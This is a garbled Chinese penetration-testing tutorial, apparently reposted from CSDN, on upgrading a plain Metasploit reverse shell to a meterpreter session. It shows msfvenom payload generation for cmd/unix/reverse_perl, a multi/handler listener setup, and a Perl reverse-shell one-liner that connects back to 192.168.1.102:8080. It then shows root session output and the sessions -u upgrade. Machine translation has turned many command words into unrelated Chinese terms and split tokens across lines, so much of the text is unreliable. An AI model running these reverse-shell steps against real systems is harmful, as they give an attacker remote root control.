向光芒四射的米克波阿神致敬
无Meterpreter Shell添加虚拟路由映射
有效负载生成:使用cmd/unix/reverse_perl 运行目标机器:在线会话会话心跳显示:假会话
在实战中,调用meterpreter模块并不方便,因为很多反向shell没有meterpreter shell。
payload生成:以cmd/unix/reverse_perl
登录后复制
[
根
@约翰
/
[暂时的]
#
无国界医生毒药
-p
指令
/
UNIX
/
反向_珍珠
丢失的
=
192.168.1.10
2
左端口
=
8080
[
-]
不
平台
曾是
选择的,
选择
msf: 模块: 平台:Unix
从
米
的
有效负载
[
-]
不
拱
选择的,
选择
拱门:
指令
从
的
有效负载
不
编码器
或者
坏角色
指定的,
输出
活的
有效负载
有效负载
尺码:
第232章
兼职工作
珍珠
-澪
-e
\’$p=fork;退出,if($p);foreach 我的$key(keys %ENV){if($ENV {$key}=~/(.*)/){$ENV{$key}=$1 ;}}$c=new IO:Socket:INET(PeerAddr,\’192.16 8.1.102:8080\’);STDIN‐fdopen($c,r);$~‐fdopen($c,w);while(){if($_=~ /(. *)/){系统$1;}};\’
1.2.3.4.5.6.7。
攻击机设置:
小心参数
登录后复制
无国界医生组织
开发(
多
/
处理程序)
展示
选项
模块
选项(
开发
/
多
/
处理程序):
姓名
当前的
环境
必需的
解释
‐‐‐‐
——————————————————
————————————
———————————————
有效负载
选项(
指令
/
UNIX
/
反向perl):
姓名
当前的
环境
必需的
解释
‐‐‐‐
——————————————————
————————————
———————————————
丢失的
192.168.1.102
是的
的
听
地址(
的
界面
可能
习惯它
规格
场地)
左端口
8080
是的
的
听
港口
开发
目标:
ID
姓名
0
通配符
目标
无国界医生组织
开发(
多
/
处理程序)
开发
-j
[
*]
开发
跑步
作为
背景
工作
0。
[
*]
已经开始了
倒退
传输控制协议
处理程序
之上
192.168.1.102:
8080
1.2.3.4.5.6.7.8.9.10.11.12.13.14.15.16.17.18.19.20.21。
靶机执行:
登录后复制
根
@kali:
#
珍珠
-澪
-e
\’$p=fork;退出,if($p);foreach 我的$key(keys %E NV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO:Socket:INET(PeerAddr,\’192.168.1.102:8080\’);STDIN‐fdopen($c,r);$~‐fdopen($c,w);while(){i f($_=~ /(.*)/){系统$1;}};\’
无参数
“使用IO”
废除
在
-e
线
0。
1.2.3.
上线 session
登录后复制
开发(
多
/
处理程序)
开发
-j
[
*]
开发
跑步
作为
背景
工作
8.
[
*]
已经开始了
倒退
传输控制协议
处理程序
之上
192.168.1.102:
8080
无国界医生组织
开发(
多
/
处理程序)
[
*]
指示
壳
会议
十
打开(
192.
168.1.102:
8080
–
192.168.1.117:
36914)
在
2019年
-02-23
06:
35:
07
-0500
无国界医生组织
开发(
多
/
处理程序)
会议
-l
积极的
会议
===============
ID
姓名
类型
信息
联系
—
‐‐‐‐
‐‐‐‐
———————————————
————————————
十
壳
指令
/
UNIX
192.168.1.102:
8080
–
192.168.1.117:
36914(
192.168。
1.117)
1.2.3.4.5.6.7.8.9.10。
msf的shell cmd没有心跳,因此无法检测会话是否存活且有效。
查看session 心跳:
登录后复制
exploit(
multi
/
handler)
>
sessions
‐x
Active
sessions
===============
Id
Name
Type
Checkin
?
Enc
?
Local
URI
Information
Connection
‐‐
‐‐‐‐
‐‐‐‐
‐‐‐‐‐‐‐‐
‐‐‐‐
‐‐‐‐‐‐‐‐‐
‐‐‐‐‐‐‐‐‐‐‐
‐‐‐‐‐‐‐‐‐‐
10
shell
cmd
/
unix
?
N
?
192.168.1.102:
8080
‐
>
192.168.1.117:
36914 (
19
2.168.1.117)
1.2.3.4.5.6.7.
假session
在msf4.0以后,体现出了meterpreter下的后渗透,
但大部分需要转换meterpreter shell。
而meterpreter又以心跳为前提,故Information为NULL时,俗称“假session”
转换meterpreter shell 参数 -u,并且出现心跳。
登录后复制
exploit(
multi
/
handler)
>
sessions
‐u
10
[
*]
Executing
\’post/multi/manage/shell_to_meterpreter\’
on
session(
s): [
10]
[
*]
Upgrading
session
ID:
10
[
*]
Starting
exploit
/
multi
/
handler
[
*]
Started
reverse
TCP
handler
on
192.168.1.102:
4433
[
*]
Sending
stage (
914728
bytes)
to
192.168.1.117
[
*]
Meterpreter
session
11
opened (
192.168.1.102:
4433
‐
>
192.168.1.117:
57692)
at
2019
‐02‐23
06:
39:
18
‐0500
[
*]
Command
stager
progress:
100.00
% (
773
/
773
bytes)
msf
exploit(
multi
/
handler)
>
sessions
‐l
Active
sessions
===============
Id
Name
Type
Information
Connection
‐‐
‐‐‐‐
‐‐‐‐
‐‐‐‐‐‐‐‐‐‐‐
‐‐‐‐‐‐‐‐‐‐
10
shell
cmd
/
unix
192.168.1.102:
8080
‐
>
192.168.1.117:
36914 (
192.168.
1.117)
11
meterpreter
x86
/
linux
uid
=
0,
gid
=
0,
euid
=
0,
egid
=
0
@
192.168.1.117
192.168.1.102:
4433
‐
>
192.168.1.117:
57692 (
192.168.1.117)
msf
exploit(
multi
/
handler)
>
sessions
‐x
Active
sessions
===============
Id
Name
Type
Checkin
?
Enc
?
Local
URI
Information
Connection
‐‐
‐‐‐‐
‐‐‐‐
‐‐‐‐‐‐‐‐
‐‐‐‐
‐‐‐‐‐‐‐‐‐
‐‐‐‐‐‐‐‐‐‐‐
‐‐‐‐‐‐‐‐‐‐
10
shell
cmd
/
unix
?
N
?
192.168.1.102:
8080
‐
>
192.168.1.117:
36914 (
19
2.168.1.117)
11
meterpreter
x86
/
linux
39s
ago
Y
?
uid
=
0,
gid
=
0,
euid
=
0,
egid
=
0
@
1
92.168.1.117
192.168.1.102:
4433
‐
>
192.168.1.117:
57692 (
192.168.1.117)
1.2.3.4.5.6.7.8.9.10.11.12.13.14.15.16.17.18.19.20.21.22.23.24.25.26.27.
登录后复制
meterpreter
>
ps
Process
List
============
PID
PPID
Name
Arch
User
Path
‐‐‐
‐‐‐‐
‐‐‐‐
‐‐‐‐
‐‐‐‐
‐‐‐‐
1
0
systemd
x86_64
root
/
lib
/
systemd
2
0
kthreadd
x86_64
root .
4
2
kworker
/
0:
0H
x86_64
root .
6
2
mm_percpu_wq
x86_64
root .
7
2
ksoftirqd
/
0
x86_64
root .
8
2
rcu_sched
x86_64
root .
…
1516
2577
923
perl
x86_64
root
/
usr
/
bin
2600
923
iegkM
x86_64
root
/
tmp
meterpreter
>
getuid
erver
username:
uid
=
0,
gid
=
0,
euid
=
0,
egid
=
0
meterpreter
>
getpid
22
Current
pid:
2600
1.2.3.4.5.6.7.8.9.10.11.12.13.14.15.16.17.18.19.20.21.22.
此时可以调用强大的meterpreter后渗透模块,有趣的渗透刚刚开始。
#以上关于渗透测试的相关内容来源网络仅供参考,相关信息请以官方公告为准!
原创文章,作者:CSDN,如若转载,请注明出处:https://www.sudun.com/ask/92589.html